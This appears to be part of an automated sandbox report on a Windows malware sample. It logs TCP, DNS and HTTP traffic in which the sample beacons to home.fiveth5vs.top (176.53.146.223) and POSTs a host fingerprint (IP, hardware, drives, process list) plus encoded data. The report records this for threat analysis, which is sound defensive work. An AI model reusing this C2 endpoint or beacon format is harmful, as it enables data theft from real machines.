                            Dec 31, 2024 09:45:26.026328087 CET8049706176.53.146.223192.168.2.9
                            Dec 31, 2024 09:45:26.026331902 CET8049706176.53.146.223192.168.2.9
                            Dec 31, 2024 09:45:26.026397943 CET8049706176.53.146.223192.168.2.9
                            Dec 31, 2024 09:45:26.026401997 CET8049706176.53.146.223192.168.2.9
                            Dec 31, 2024 09:45:26.026418924 CET8049706176.53.146.223192.168.2.9
                            Dec 31, 2024 09:45:26.026429892 CET8049706176.53.146.223192.168.2.9
                            Dec 31, 2024 09:45:26.026490927 CET8049706176.53.146.223192.168.2.9
                            Dec 31, 2024 09:45:26.026494980 CET8049706176.53.146.223192.168.2.9
                            Dec 31, 2024 09:45:26.026536942 CET8049706176.53.146.223192.168.2.9
                            Dec 31, 2024 09:45:26.026541948 CET8049706176.53.146.223192.168.2.9
                            Dec 31, 2024 09:45:26.026566982 CET4970680192.168.2.9176.53.146.223
                            Dec 31, 2024 09:45:26.026616096 CET8049706176.53.146.223192.168.2.9
                            Dec 31, 2024 09:45:26.026621103 CET8049706176.53.146.223192.168.2.9
                            Dec 31, 2024 09:45:26.026628017 CET4970680192.168.2.9176.53.146.223
                            Dec 31, 2024 09:45:26.026659966 CET8049706176.53.146.223192.168.2.9
                            Dec 31, 2024 09:45:26.026664972 CET8049706176.53.146.223192.168.2.9
                            Dec 31, 2024 09:45:26.026674032 CET8049706176.53.146.223192.168.2.9
                            Dec 31, 2024 09:45:26.026732922 CET8049706176.53.146.223192.168.2.9
                            Dec 31, 2024 09:45:26.026736975 CET8049706176.53.146.223192.168.2.9
                            Dec 31, 2024 09:45:26.026746035 CET8049706176.53.146.223192.168.2.9
                            Dec 31, 2024 09:45:26.026758909 CET8049706176.53.146.223192.168.2.9
                            Dec 31, 2024 09:45:26.026762962 CET8049706176.53.146.223192.168.2.9
                            Dec 31, 2024 09:45:26.026787996 CET8049706176.53.146.223192.168.2.9
                            Dec 31, 2024 09:45:26.026803970 CET8049706176.53.146.223192.168.2.9
                            Dec 31, 2024 09:45:26.026839018 CET8049706176.53.146.223192.168.2.9
                            Dec 31, 2024 09:45:26.026844025 CET8049706176.53.146.223192.168.2.9
                            Dec 31, 2024 09:45:26.026859999 CET8049706176.53.146.223192.168.2.9
                            Dec 31, 2024 09:45:26.026907921 CET8049706176.53.146.223192.168.2.9
                            Dec 31, 2024 09:45:26.026911974 CET8049706176.53.146.223192.168.2.9
                            Dec 31, 2024 09:45:26.026921034 CET8049706176.53.146.223192.168.2.9
                            Dec 31, 2024 09:45:26.026957989 CET8049706176.53.146.223192.168.2.9
                            Dec 31, 2024 09:45:26.026962042 CET8049706176.53.146.223192.168.2.9
                            Dec 31, 2024 09:45:26.026995897 CET8049706176.53.146.223192.168.2.9
                            Dec 31, 2024 09:45:26.026999950 CET8049706176.53.146.223192.168.2.9
                            Dec 31, 2024 09:45:26.027043104 CET8049706176.53.146.223192.168.2.9
                            Dec 31, 2024 09:45:26.027046919 CET8049706176.53.146.223192.168.2.9
                            Dec 31, 2024 09:45:26.027065039 CET8049706176.53.146.223192.168.2.9
                            Dec 31, 2024 09:45:26.027069092 CET8049706176.53.146.223192.168.2.9
                            Dec 31, 2024 09:45:26.027121067 CET8049706176.53.146.223192.168.2.9
                            Dec 31, 2024 09:45:26.027124882 CET8049706176.53.146.223192.168.2.9
                            Dec 31, 2024 09:45:26.027160883 CET8049706176.53.146.223192.168.2.9
                            Dec 31, 2024 09:45:26.027165890 CET8049706176.53.146.223192.168.2.9
                            Dec 31, 2024 09:45:26.027215004 CET8049706176.53.146.223192.168.2.9
                            Dec 31, 2024 09:45:26.027219057 CET8049706176.53.146.223192.168.2.9
                            Dec 31, 2024 09:45:26.027228117 CET8049706176.53.146.223192.168.2.9
                            Dec 31, 2024 09:45:26.027273893 CET8049706176.53.146.223192.168.2.9
                            Dec 31, 2024 09:45:26.027277946 CET8049706176.53.146.223192.168.2.9
                            Dec 31, 2024 09:45:26.027292013 CET8049706176.53.146.223192.168.2.9
                            Dec 31, 2024 09:45:26.027420044 CET8049706176.53.146.223192.168.2.9
                            Dec 31, 2024 09:45:26.027425051 CET8049706176.53.146.223192.168.2.9
                            Dec 31, 2024 09:45:26.031393051 CET8049706176.53.146.223192.168.2.9
                            Dec 31, 2024 09:45:26.031399965 CET8049706176.53.146.223192.168.2.9
                            Dec 31, 2024 09:45:26.031452894 CET8049706176.53.146.223192.168.2.9
                            Dec 31, 2024 09:45:26.031457901 CET8049706176.53.146.223192.168.2.9
                            Dec 31, 2024 09:45:26.031521082 CET8049706176.53.146.223192.168.2.9
                            Dec 31, 2024 09:45:26.031524897 CET8049706176.53.146.223192.168.2.9
                            Dec 31, 2024 09:45:26.031538963 CET8049706176.53.146.223192.168.2.9
                            Dec 31, 2024 09:45:26.031543016 CET8049706176.53.146.223192.168.2.9
                            Dec 31, 2024 09:45:26.031575918 CET8049706176.53.146.223192.168.2.9
                            Dec 31, 2024 09:45:26.031580925 CET8049706176.53.146.223192.168.2.9
                            Dec 31, 2024 09:45:26.031644106 CET8049706176.53.146.223192.168.2.9
                            Dec 31, 2024 09:45:26.031647921 CET8049706176.53.146.223192.168.2.9
                            Dec 31, 2024 09:45:26.031660080 CET8049706176.53.146.223192.168.2.9
                            Dec 31, 2024 09:45:26.031663895 CET8049706176.53.146.223192.168.2.9
                            Dec 31, 2024 09:45:26.031696081 CET8049706176.53.146.223192.168.2.9
                            Dec 31, 2024 09:45:26.031699896 CET8049706176.53.146.223192.168.2.9
                            Dec 31, 2024 09:45:26.031711102 CET8049706176.53.146.223192.168.2.9
                            Dec 31, 2024 09:45:26.031750917 CET8049706176.53.146.223192.168.2.9
                            Dec 31, 2024 09:45:26.031789064 CET8049706176.53.146.223192.168.2.9
                            Dec 31, 2024 09:45:26.031794071 CET8049706176.53.146.223192.168.2.9
                            Dec 31, 2024 09:45:26.031847000 CET8049706176.53.146.223192.168.2.9
                            Dec 31, 2024 09:45:26.031851053 CET8049706176.53.146.223192.168.2.9
                            Dec 31, 2024 09:45:26.031867027 CET8049706176.53.146.223192.168.2.9
                            Dec 31, 2024 09:45:26.031872034 CET8049706176.53.146.223192.168.2.9
                            Dec 31, 2024 09:45:26.031932116 CET8049706176.53.146.223192.168.2.9
                            Dec 31, 2024 09:45:26.031935930 CET8049706176.53.146.223192.168.2.9
                            Dec 31, 2024 09:45:26.031940937 CET4970680192.168.2.9176.53.146.223
                            Dec 31, 2024 09:45:26.031980991 CET8049706176.53.146.223192.168.2.9
                            Dec 31, 2024 09:45:26.031985998 CET8049706176.53.146.223192.168.2.9
                            Dec 31, 2024 09:45:26.031995058 CET4970680192.168.2.9176.53.146.223
                            Dec 31, 2024 09:45:26.031999111 CET8049706176.53.146.223192.168.2.9
                            Dec 31, 2024 09:45:26.032002926 CET8049706176.53.146.223192.168.2.9
                            Dec 31, 2024 09:45:26.032033920 CET8049706176.53.146.223192.168.2.9
                            Dec 31, 2024 09:45:26.032037973 CET8049706176.53.146.223192.168.2.9
                            Dec 31, 2024 09:45:26.032088995 CET8049706176.53.146.223192.168.2.9
                            Dec 31, 2024 09:45:26.032093048 CET8049706176.53.146.223192.168.2.9
                            Dec 31, 2024 09:45:26.032108068 CET8049706176.53.146.223192.168.2.9
                            Dec 31, 2024 09:45:26.032111883 CET8049706176.53.146.223192.168.2.9
                            Dec 31, 2024 09:45:26.032157898 CET8049706176.53.146.223192.168.2.9
                            Dec 31, 2024 09:45:26.032161951 CET8049706176.53.146.223192.168.2.9
                            Dec 31, 2024 09:45:26.032202959 CET8049706176.53.146.223192.168.2.9
                            Dec 31, 2024 09:45:26.032207012 CET8049706176.53.146.223192.168.2.9
                            Dec 31, 2024 09:45:26.032231092 CET8049706176.53.146.223192.168.2.9
                            Dec 31, 2024 09:45:26.032234907 CET8049706176.53.146.223192.168.2.9
                            Dec 31, 2024 09:45:26.032279015 CET8049706176.53.146.223192.168.2.9
                            Dec 31, 2024 09:45:26.032283068 CET8049706176.53.146.223192.168.2.9
                            Dec 31, 2024 09:45:26.032310009 CET8049706176.53.146.223192.168.2.9
                            Dec 31, 2024 09:45:26.032315016 CET8049706176.53.146.223192.168.2.9
                            Dec 31, 2024 09:45:26.032344103 CET8049706176.53.146.223192.168.2.9
                            Dec 31, 2024 09:45:26.032347918 CET8049706176.53.146.223192.168.2.9
                            Dec 31, 2024 09:45:26.032388926 CET8049706176.53.146.223192.168.2.9
                            Dec 31, 2024 09:45:26.032392979 CET8049706176.53.146.223192.168.2.9
                            Dec 31, 2024 09:45:26.032427073 CET8049706176.53.146.223192.168.2.9
                            Dec 31, 2024 09:45:26.032430887 CET8049706176.53.146.223192.168.2.9
                            Dec 31, 2024 09:45:26.032448053 CET8049706176.53.146.223192.168.2.9
                            Dec 31, 2024 09:45:26.036762953 CET8049706176.53.146.223192.168.2.9
                            Dec 31, 2024 09:45:26.036856890 CET8049706176.53.146.223192.168.2.9
                            Dec 31, 2024 09:45:26.036860943 CET8049706176.53.146.223192.168.2.9
                            Dec 31, 2024 09:45:26.036880016 CET8049706176.53.146.223192.168.2.9
                            Dec 31, 2024 09:45:26.036921024 CET8049706176.53.146.223192.168.2.9
                            Dec 31, 2024 09:45:26.036979914 CET8049706176.53.146.223192.168.2.9
                            Dec 31, 2024 09:45:26.036989927 CET8049706176.53.146.223192.168.2.9
                            Dec 31, 2024 09:45:26.037036896 CET8049706176.53.146.223192.168.2.9
                            Dec 31, 2024 09:45:26.037036896 CET4970680192.168.2.9176.53.146.223
                            Dec 31, 2024 09:45:26.037040949 CET8049706176.53.146.223192.168.2.9
                            Dec 31, 2024 09:45:26.037091017 CET8049706176.53.146.223192.168.2.9
                            Dec 31, 2024 09:45:26.037096977 CET8049706176.53.146.223192.168.2.9
                            Dec 31, 2024 09:45:26.037143946 CET8049706176.53.146.223192.168.2.9
                            Dec 31, 2024 09:45:26.037147999 CET8049706176.53.146.223192.168.2.9
                            Dec 31, 2024 09:45:26.037192106 CET8049706176.53.146.223192.168.2.9
                            Dec 31, 2024 09:45:26.037201881 CET8049706176.53.146.223192.168.2.9
                            Dec 31, 2024 09:45:26.037224054 CET8049706176.53.146.223192.168.2.9
                            Dec 31, 2024 09:45:26.037228107 CET8049706176.53.146.223192.168.2.9
                            Dec 31, 2024 09:45:26.037312984 CET8049706176.53.146.223192.168.2.9
                            Dec 31, 2024 09:45:26.037317038 CET8049706176.53.146.223192.168.2.9
                            Dec 31, 2024 09:45:26.037329912 CET8049706176.53.146.223192.168.2.9
                            Dec 31, 2024 09:45:26.037333965 CET8049706176.53.146.223192.168.2.9
                            Dec 31, 2024 09:45:26.037419081 CET8049706176.53.146.223192.168.2.9
                            Dec 31, 2024 09:45:26.037422895 CET8049706176.53.146.223192.168.2.9
                            Dec 31, 2024 09:45:26.037446976 CET8049706176.53.146.223192.168.2.9
                            Dec 31, 2024 09:45:26.037451029 CET8049706176.53.146.223192.168.2.9
                            Dec 31, 2024 09:45:26.037506104 CET8049706176.53.146.223192.168.2.9
                            Dec 31, 2024 09:45:26.037509918 CET8049706176.53.146.223192.168.2.9
                            Dec 31, 2024 09:45:26.037544012 CET8049706176.53.146.223192.168.2.9
                            Dec 31, 2024 09:45:26.037614107 CET8049706176.53.146.223192.168.2.9
                            Dec 31, 2024 09:45:26.037617922 CET8049706176.53.146.223192.168.2.9
                            Dec 31, 2024 09:45:26.037627935 CET8049706176.53.146.223192.168.2.9
                            Dec 31, 2024 09:45:26.037632942 CET8049706176.53.146.223192.168.2.9
                            Dec 31, 2024 09:45:26.037636995 CET8049706176.53.146.223192.168.2.9
                            Dec 31, 2024 09:45:26.037695885 CET8049706176.53.146.223192.168.2.9
                            Dec 31, 2024 09:45:26.037699938 CET8049706176.53.146.223192.168.2.9
                            Dec 31, 2024 09:45:26.037729979 CET8049706176.53.146.223192.168.2.9
                            Dec 31, 2024 09:45:26.037734985 CET8049706176.53.146.223192.168.2.9
                            Dec 31, 2024 09:45:26.037746906 CET8049706176.53.146.223192.168.2.9
                            Dec 31, 2024 09:45:26.037750959 CET8049706176.53.146.223192.168.2.9
                            Dec 31, 2024 09:45:26.037791014 CET8049706176.53.146.223192.168.2.9
                            Dec 31, 2024 09:45:26.037795067 CET8049706176.53.146.223192.168.2.9
                            Dec 31, 2024 09:45:26.037837982 CET8049706176.53.146.223192.168.2.9
                            Dec 31, 2024 09:45:26.037842035 CET8049706176.53.146.223192.168.2.9
                            Dec 31, 2024 09:45:26.037875891 CET8049706176.53.146.223192.168.2.9
                            Dec 31, 2024 09:45:26.037879944 CET8049706176.53.146.223192.168.2.9
                            Dec 31, 2024 09:45:26.037890911 CET8049706176.53.146.223192.168.2.9
                            Dec 31, 2024 09:45:26.037925959 CET8049706176.53.146.223192.168.2.9
                            Dec 31, 2024 09:45:26.037930012 CET8049706176.53.146.223192.168.2.9
                            Dec 31, 2024 09:45:26.038121939 CET8049706176.53.146.223192.168.2.9
                            Dec 31, 2024 09:45:26.038125992 CET8049706176.53.146.223192.168.2.9
                            Dec 31, 2024 09:45:26.038150072 CET8049706176.53.146.223192.168.2.9
                            Dec 31, 2024 09:45:26.038216114 CET8049706176.53.146.223192.168.2.9
                            Dec 31, 2024 09:45:26.038220882 CET8049706176.53.146.223192.168.2.9
                            Dec 31, 2024 09:45:26.041908026 CET8049706176.53.146.223192.168.2.9
                            Dec 31, 2024 09:45:26.041923046 CET8049706176.53.146.223192.168.2.9
                            Dec 31, 2024 09:45:26.042004108 CET8049706176.53.146.223192.168.2.9
                            Dec 31, 2024 09:45:26.042012930 CET8049706176.53.146.223192.168.2.9
                            Dec 31, 2024 09:45:26.042054892 CET8049706176.53.146.223192.168.2.9
                            Dec 31, 2024 09:45:26.042058945 CET8049706176.53.146.223192.168.2.9
                            Dec 31, 2024 09:45:26.042093992 CET8049706176.53.146.223192.168.2.9
                            Dec 31, 2024 09:45:26.042098999 CET8049706176.53.146.223192.168.2.9
                            Dec 31, 2024 09:45:26.042143106 CET8049706176.53.146.223192.168.2.9
                            Dec 31, 2024 09:45:26.042146921 CET8049706176.53.146.223192.168.2.9
                            Dec 31, 2024 09:45:26.042185068 CET8049706176.53.146.223192.168.2.9
                            Dec 31, 2024 09:45:26.042216063 CET8049706176.53.146.223192.168.2.9
                            Dec 31, 2024 09:45:26.042278051 CET8049706176.53.146.223192.168.2.9
                            Dec 31, 2024 09:45:26.042282104 CET8049706176.53.146.223192.168.2.9
                            Dec 31, 2024 09:45:26.042332888 CET8049706176.53.146.223192.168.2.9
                            Dec 31, 2024 09:45:26.042336941 CET8049706176.53.146.223192.168.2.9
                            Dec 31, 2024 09:45:26.042370081 CET8049706176.53.146.223192.168.2.9
                            Dec 31, 2024 09:45:26.042380095 CET8049706176.53.146.223192.168.2.9
                            Dec 31, 2024 09:45:26.042419910 CET8049706176.53.146.223192.168.2.9
                            Dec 31, 2024 09:45:26.042423964 CET8049706176.53.146.223192.168.2.9
                            Dec 31, 2024 09:45:26.042434931 CET8049706176.53.146.223192.168.2.9
                            Dec 31, 2024 09:45:26.042438984 CET8049706176.53.146.223192.168.2.9
                            Dec 31, 2024 09:45:26.042467117 CET8049706176.53.146.223192.168.2.9
                            Dec 31, 2024 09:45:26.042541027 CET8049706176.53.146.223192.168.2.9
                            Dec 31, 2024 09:45:26.042545080 CET8049706176.53.146.223192.168.2.9
                            Dec 31, 2024 09:45:26.042555094 CET8049706176.53.146.223192.168.2.9
                            Dec 31, 2024 09:45:26.042567968 CET8049706176.53.146.223192.168.2.9
                            Dec 31, 2024 09:45:26.042576075 CET8049706176.53.146.223192.168.2.9
                            Dec 31, 2024 09:45:26.042613029 CET8049706176.53.146.223192.168.2.9
                            Dec 31, 2024 09:45:26.042622089 CET8049706176.53.146.223192.168.2.9
                            Dec 31, 2024 09:45:26.042670012 CET8049706176.53.146.223192.168.2.9
                            Dec 31, 2024 09:45:26.042674065 CET8049706176.53.146.223192.168.2.9
                            Dec 31, 2024 09:45:26.042726994 CET8049706176.53.146.223192.168.2.9
                            Dec 31, 2024 09:45:26.042731047 CET8049706176.53.146.223192.168.2.9
                            Dec 31, 2024 09:45:26.042735100 CET8049706176.53.146.223192.168.2.9
                            Dec 31, 2024 09:45:29.171086073 CET8049706176.53.146.223192.168.2.9
                            Dec 31, 2024 09:45:29.171576977 CET4970680192.168.2.9176.53.146.223
                            Dec 31, 2024 09:45:29.176601887 CET8049706176.53.146.223192.168.2.9
                            Dec 31, 2024 09:45:29.176650047 CET4970680192.168.2.9176.53.146.223
                            Dec 31, 2024 09:45:29.853503942 CET4970780192.168.2.9176.53.146.223
                            Dec 31, 2024 09:45:29.858655930 CET8049707176.53.146.223192.168.2.9
                            Dec 31, 2024 09:45:29.858756065 CET4970780192.168.2.9176.53.146.223
                            Dec 31, 2024 09:45:29.859013081 CET4970780192.168.2.9176.53.146.223
                            Dec 31, 2024 09:45:29.863730907 CET8049707176.53.146.223192.168.2.9
                            Dec 31, 2024 09:45:30.688366890 CET8049707176.53.146.223192.168.2.9
                            Dec 31, 2024 09:45:30.688849926 CET4970780192.168.2.9176.53.146.223
                            Dec 31, 2024 09:45:30.693866014 CET8049707176.53.146.223192.168.2.9
                            Dec 31, 2024 09:45:30.693933964 CET4970780192.168.2.9176.53.146.223
                            Dec 31, 2024 09:45:31.502676964 CET4970880192.168.2.9176.53.146.223
                            Dec 31, 2024 09:45:31.507524967 CET8049708176.53.146.223192.168.2.9
                            Dec 31, 2024 09:45:31.507610083 CET4970880192.168.2.9176.53.146.223
                            Dec 31, 2024 09:45:31.507883072 CET4970880192.168.2.9176.53.146.223
                            Dec 31, 2024 09:45:31.512649059 CET8049708176.53.146.223192.168.2.9
                            Dec 31, 2024 09:45:32.606327057 CET8049708176.53.146.223192.168.2.9
                            Dec 31, 2024 09:45:32.606849909 CET4970880192.168.2.9176.53.146.223
                            Dec 31, 2024 09:45:32.611902952 CET8049708176.53.146.223192.168.2.9
                            Dec 31, 2024 09:45:32.611958027 CET4970880192.168.2.9176.53.146.223
                            Dec 31, 2024 09:45:50.440867901 CET6163353192.168.2.91.1.1.1
                            Dec 31, 2024 09:45:50.447299004 CET53616331.1.1.1192.168.2.9
                            Dec 31, 2024 09:45:50.447406054 CET6163353192.168.2.91.1.1.1
                            Dec 31, 2024 09:45:50.452264071 CET53616331.1.1.1192.168.2.9
                            Dec 31, 2024 09:45:50.978281021 CET6163353192.168.2.91.1.1.1
                            Dec 31, 2024 09:45:50.983289003 CET53616331.1.1.1192.168.2.9
                            Dec 31, 2024 09:45:50.983357906 CET6163353192.168.2.91.1.1.1

                            UDP Packets

                            TimestampSource PortDest PortSource IPDest IP
                            Dec 31, 2024 09:45:22.202955961 CET5559653192.168.2.91.1.1.1
                            Dec 31, 2024 09:45:22.203018904 CET5559653192.168.2.91.1.1.1
                            Dec 31, 2024 09:45:22.210005045 CET53555961.1.1.1192.168.2.9
                            Dec 31, 2024 09:45:22.210335016 CET53555961.1.1.1192.168.2.9
                            Dec 31, 2024 09:45:24.596910000 CET5559953192.168.2.91.1.1.1
                            Dec 31, 2024 09:45:24.597090960 CET5559953192.168.2.91.1.1.1
                            Dec 31, 2024 09:45:25.501094103 CET53555991.1.1.1192.168.2.9
                            Dec 31, 2024 09:45:25.501184940 CET53555991.1.1.1192.168.2.9
                            Dec 31, 2024 09:45:29.231668949 CET5560153192.168.2.91.1.1.1
                            Dec 31, 2024 09:45:29.231780052 CET5560153192.168.2.91.1.1.1
                            Dec 31, 2024 09:45:29.851187944 CET53556011.1.1.1192.168.2.9
                            Dec 31, 2024 09:45:29.851293087 CET53556011.1.1.1192.168.2.9
                            Dec 31, 2024 09:45:30.742609978 CET5560353192.168.2.91.1.1.1
                            Dec 31, 2024 09:45:30.742664099 CET5560353192.168.2.91.1.1.1
                            Dec 31, 2024 09:45:31.279474020 CET53556031.1.1.1192.168.2.9
                            Dec 31, 2024 09:45:31.501432896 CET53556031.1.1.1192.168.2.9
                            Dec 31, 2024 09:45:50.440259933 CET53654241.1.1.1192.168.2.9

                            DNS Queries

                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                            Dec 31, 2024 09:45:22.202955961 CET192.168.2.91.1.1.10x3af6Standard query (0)httpbin.orgA (IP address)IN (0x0001)false
                            Dec 31, 2024 09:45:22.203018904 CET192.168.2.91.1.1.10xc0d2Standard query (0)httpbin.org28IN (0x0001)false
                            Dec 31, 2024 09:45:24.596910000 CET192.168.2.91.1.1.10x44d4Standard query (0)home.fiveth5vs.topA (IP address)IN (0x0001)false
                            Dec 31, 2024 09:45:24.597090960 CET192.168.2.91.1.1.10xfa75Standard query (0)home.fiveth5vs.top28IN (0x0001)false
                            Dec 31, 2024 09:45:29.231668949 CET192.168.2.91.1.1.10xf0fStandard query (0)home.fiveth5vs.topA (IP address)IN (0x0001)false
                            Dec 31, 2024 09:45:29.231780052 CET192.168.2.91.1.1.10x8fbaStandard query (0)home.fiveth5vs.top28IN (0x0001)false
                            Dec 31, 2024 09:45:30.742609978 CET192.168.2.91.1.1.10xdd6Standard query (0)home.fiveth5vs.topA (IP address)IN (0x0001)false
                            Dec 31, 2024 09:45:30.742664099 CET192.168.2.91.1.1.10x29b4Standard query (0)home.fiveth5vs.top28IN (0x0001)false

                            DNS Answers

                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                            Dec 31, 2024 09:45:22.210335016 CET1.1.1.1192.168.2.90x3af6No error (0)httpbin.org34.200.57.114A (IP address)IN (0x0001)false
                            Dec 31, 2024 09:45:22.210335016 CET1.1.1.1192.168.2.90x3af6No error (0)httpbin.org34.197.122.172A (IP address)IN (0x0001)false
                            Dec 31, 2024 09:45:25.501094103 CET1.1.1.1192.168.2.90x44d4No error (0)home.fiveth5vs.top176.53.146.223A (IP address)IN (0x0001)false
                            Dec 31, 2024 09:45:29.851187944 CET1.1.1.1192.168.2.90xf0fNo error (0)home.fiveth5vs.top176.53.146.223A (IP address)IN (0x0001)false
                            Dec 31, 2024 09:45:31.501432896 CET1.1.1.1192.168.2.90xdd6No error (0)home.fiveth5vs.top176.53.146.223A (IP address)IN (0x0001)false

                            HTTP Request Dependency Graph

                            • httpbin.org
                            • home.fiveth5vs.top

                            HTTP Packets

                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            0192.168.2.949706176.53.146.223801136C:\Users\user\Desktop\ivHDHq51Ar.exe
                            TimestampBytes transferredDirectionData
                            Dec 31, 2024 09:45:25.508774042 CET12360OUTPOST /KhxTILlSHLygUudVWlQk1735537737 HTTP/1.1
                            Host: home.fiveth5vs.top
                            Accept: */*
                            Content-Type: application/json
                            Content-Length: 501538
                            Data Raw: 7b 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 20 22 63 75 72 72 65 6e 74 5f 74 69 6d 65 22 3a 20 22 38 34 38 35 39 30 39 31 33 37 32 30 36 37 38 33 37 37 37 22 2c 20 22 4e 75 6d 5f 70 72 6f 63 65 73 73 6f 72 22 3a 20 34 2c 20 22 4e 75 6d 5f 72 61 6d 22 3a 20 37 2c 20 22 64 72 69 76 65 72 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 43 3a 5c 5c 22 2c 20 22 61 6c 6c 22 3a 20 32 32 33 2e 30 2c 20 22 66 72 65 65 22 3a 20 31 36 38 2e 30 20 7d 20 5d 2c 20 22 4e 75 6d 5f 64 69 73 70 6c 61 79 73 22 3a 20 31 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 78 22 3a 20 31 32 38 30 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 79 22 3a 20 31 30 32 34 2c 20 22 72 65 63 65 6e 74 5f 66 69 6c 65 73 22 3a 20 33 38 2c 20 22 70 72 6f 63 65 73 73 65 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 5b 53 79 73 74 65 6d 20 50 72 6f 63 65 73 73 5d 22 2c 20 22 70 69 64 22 3a 20 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 53 79 73 74 65 6d 22 2c 20 22 70 69 64 22 3a 20 34 20 7d 2c 20 7b 20 22 6e 61 [TRUNCATED]
                            Data Ascii: { "ip": "8.46.123.189", "current_time": "8485909137206783777", "Num_processor": 4, "Num_ram": 7, "drivers": [ { "name": "C:\\", "all": 223.0, "free": 168.0 } ], "Num_displays": 1, "resolution_x": 1280, "resolution_y": 1024, "recent_files": 38, "processes": [ { "name": "[System Process]", "pid": 0 }, { "name": "System", "pid": 4 }, { "name": "Registry", "pid": 92 }, { "name": "smss.exe", "pid": 328 }, { "name": "csrss.exe", "pid": 412 }, { "name": "wininit.exe", "pid": 488 }, { "name": "csrss.exe", "pid": 496 }, { "name": "winlogon.exe", "pid": 584 }, { "name": "services.exe", "pid": 632 }, { "name": "lsass.exe", "pid": 640 }, { "name": "svchost.exe", "pid": 752 }, { "name": "fontdrvhost.exe", "pid": 776 }, { "name": "fontdrvhost.exe", "pid": 784 }, { "name": "svchost.exe", "pid": 880 }, { "name": "svchost.exe", "pid": 928 }, { "name": "dwm.exe", "pid": 992 }, { "name": "svchost.exe", "pid": 436 }, { "name": "svchost.exe", "pid": 376 }, { "name": "svchost.exe", "pid": 792 }, { "name": "svchost.exe" [TRUNCATED]
                            Dec 31, 2024 09:45:25.513742924 CET4944OUTData Raw: 52 45 56 76 32 63 6e 6c 5a 56 56 57 6b 66 34 77 66 48 67 50 49 51 41 43 37 69 4c 34 6e 78 78 68 33 49 33 4d 49 34 30 51 45 6e 59 69 72 68 52 5c 2f 41 5c 2f 6a 4a 39 4e 66 4e 66 44 66 78 50 34 72 38 4e 2b 47 50 43 66 41 38 58 5c 2f 77 43 70 63 73
                            Data Ascii: REVv2cnlZVVWkf4wfHgPIQAC7iL4nxxh3I3MI40QEnYirhR\/A\/jJ9NfNfDfxP4r8N+GPCfA8X\/wCpcskwed55nniJX4NpTzfOuHMo4rhgsrwGB4B40q4vDYXJs\/yiVfHYrEZe5YyviMNSwk4Yb6xU\/wBb\/o\/fs1\/DvxH8BPCzxs8WPpIcW+G+K8ZMDxbxFwdwZ4e+AWU+LdbC8H8J+IfF3hbLOOJ894j8ePBrDZXmWa
                            Dec 31, 2024 09:45:25.513772964 CET4944OUTData Raw: 34 58 44 31 34 50 47 34 72 36 39 4b 70 52 70 59 6c 52 70 54 39 6a 4f 38 6c 79 4e 78 5c 2f 31 55 38 4c 76 45 66 68 5c 2f 4c 5c 2f 42 4c 77 38 71 5a 78 68 4b 32 64 31 61 47 51 59 36 46 62 4c 73 48 52 77 57 4e 78 2b 43 79 6e 68 7a 47 35 6e 6c 32 4c
                            Data Ascii: 4XD14PG4r69KpRpYlRpT9jO8lyNx\/1U8LvEfh\/L\/BLw8qZxhK2d1aGQY6FbLsHRwWNx+CynhzG5nl2LzVYXF4jDzWDwiy+EK1TDSdWCrU7RftIKf6LJ8C5dK01z4c8WaXq1vCS4t\/EEcfhHUipUSSM0t1eX\/hqOCEHHn3XiS0llxuFpGSEHJvpvhHSFDeIPGEF1c7ULaR4Msz4iu4pM7ngvNYuZ9J8MxRsgCre6Lq3iXyp
                            Dec 31, 2024 09:45:25.513833046 CET4944OUTData Raw: 2b 48 48 2b 54 54 4a 57 5c 2f 64 37 33 5c 2f 37 2b 66 35 36 63 34 5c 2f 77 71 62 5c 2f 57 66 78 5c 2f 39 73 5c 2f 38 41 36 33 38 76 35 55 78 68 75 6b 64 39 6b 65 50 38 5c 2f 68 7a 7a 5c 2f 77 44 72 6f 4e 43 74 74 33 52 38 6e 79 2b 30 55 58 6d 5c
                            Data Ascii: +HH+TTJW\/d73\/7+f56c4\/wqb\/Wfx\/9s\/8A638v5Uxhukd9keP8\/hzz\/wDroNCtt3R8ny+0UXm\/8vH4\/wBO\/aoW+RUd0ynXzPK\/H\/8AVVpDt\/d\/9MvN8zn\/AD\/npSN\/rP8AYMX+rjz\/AJ7d6DSn1+X6lbb\/AB9PTzJfxqs38L5jD\/63\/P8AP\/Jqyy7uB878RRSdfO+x+n4flTGj5f8Aj\/z+fX9KD
                            Dec 31, 2024 09:45:25.513851881 CET4944OUTData Raw: 51 32 74 36 46 38 50 64 59 31 57 58 77 70 5a 36 39 71 2b 76 33 55 39 6a 65 32 6d 76 36 31 59 61 68 2b 69 64 66 69 70 5c 2f 77 56 4c 5c 2f 41 47 55 66 69 31 2b 31 6c 38 63 5c 2f 32 57 66 42 66 77 30 38 43 2b 44 39 54 74 5c 2f 2b 46 47 66 74 73 61
                            Data Ascii: Q2t6F8PdY1WXwpZ69q+v3U9je2mv61Yah+idfip\/wVL\/AGUfi1+1l8c\/2WfBfw08C+D9Tt\/+FGftsaDffF34h2njeLw1+z34p8YXP7L9n4I+KXhXX\/BnhzWJNP8AjboMmm6\/rPwn0e+1nwYPEL6J4oRfE1tYadq1vcfkb8Z\/2V\/j3qHgb9r7Qvg9+zv+0NB8Up\/ih\/wVHv8A4\/fEA\/Cbx74Zg\/aT+D3xD8TeMo
                            Dec 31, 2024 09:45:25.513886929 CET2472OUTData Raw: 2f 35 36 5c 2f 6c 2b 48 54 70 54 50 75 73 6e 38 66 38 41 73 53 66 6c 32 70 37 62 48 6a 6d 33 2b 59 6e 6d 66 39 73 4d 66 35 5c 2f 2b 76 6b 55 2b 50 39 35 36 6f 5c 2f 38 41 79 79 6a 6b 69 78 5c 2f 6e 38 66 65 67 43 6e 4a 5c 2f 65 54 36 2b 56 2b 5a
